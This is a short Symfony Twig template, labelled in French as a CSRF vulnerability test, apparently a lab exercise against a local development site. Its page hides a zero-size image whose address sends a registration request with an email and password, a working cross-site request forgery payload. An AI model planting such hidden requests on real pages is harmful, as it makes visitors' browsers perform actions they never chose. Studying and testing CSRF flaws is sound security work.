{% extends 'base.html.twig' %}

{% block title %}Log in!{% endblock %}

{% block body %}
    <div class="container">
        <img src="http://www.symfony.vbox/inscriptionCSRF?user%5Bemail%5D=test91%40hotmail.fr&user%5Bpassword%5D=test" alt="" width="0" height="0">
    </div>

    Voici un essai de faille csrf

{% endblock %}
